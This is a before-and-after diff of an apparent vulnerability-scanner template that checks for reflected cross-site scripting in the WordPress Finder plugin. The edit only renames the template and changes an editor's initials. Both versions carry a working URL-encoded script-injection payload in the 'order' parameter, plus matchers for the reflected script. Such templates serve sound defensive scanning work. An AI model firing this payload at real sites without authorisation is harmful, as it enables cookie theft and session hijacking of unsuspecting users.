vulnerabilities/wordpress/wp-finder-xss.yaml (before)
id: wp-finder-xss

info:
  name: WordPress Plugin Finder - Cross-Site Scripting
  author: daffainfo
  severity: high
  description: WordPress Plugin Finder contains a cross-site scripting vulnerability via the order parameter. An attacker can execute arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
  reference:
    - https://packetstormsecurity.com/files/115902/WordPress-Finder-Cross-Site-Scripting.html
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cwe-id: CWE-79
  tags: xss,wp-plugin,packetstorm,wordpress

requests:
  - method: GET
    path:
      - '{{BaseURL}}/wp-content/plugins/finder/index.php?by=type&dir=tv&order=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "</script><script>alert(document.domain)</script>"
        part: body

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200

# Enhanced by md on 2022/09/23

vulnerabilities/wordpress/wp-finder-xss.yaml (after)
id: wp-finder-xss

info:
  name: WordPress Finder - Cross-Site Scripting
  author: daffainfo
  severity: high
  description: WordPress Plugin Finder contains a cross-site scripting vulnerability via the order parameter. An attacker can execute arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
  reference:
    - https://packetstormsecurity.com/files/115902/WordPress-Finder-Cross-Site-Scripting.html
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cwe-id: CWE-79
  tags: xss,wp-plugin,packetstorm,wordpress

requests:
  - method: GET
    path:
      - '{{BaseURL}}/wp-content/plugins/finder/index.php?by=type&dir=tv&order=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "</script><script>alert(document.domain)</script>"
        part: body

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200

# Enhanced by mp on 2022/09/23

vulnerabilities/wordpress/wp-finder-xss.yaml (diff)
@@ -1,7 +1,7 @@
 id: wp-finder-xss
 
 info:
-  name: WordPress Plugin Finder - Cross-Site Scripting
+  name: WordPress Finder - Cross-Site Scripting
   author: daffainfo
   severity: high
   description: WordPress Plugin Finder contains a cross-site scripting vulnerability via the order parameter. An attacker can execute arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
@@ -34,4 +34,4 @@ requests:
         status:
           - 200
 
-# Enhanced by md on 2022/09/23
+# Enhanced by mp on 2022/09/23
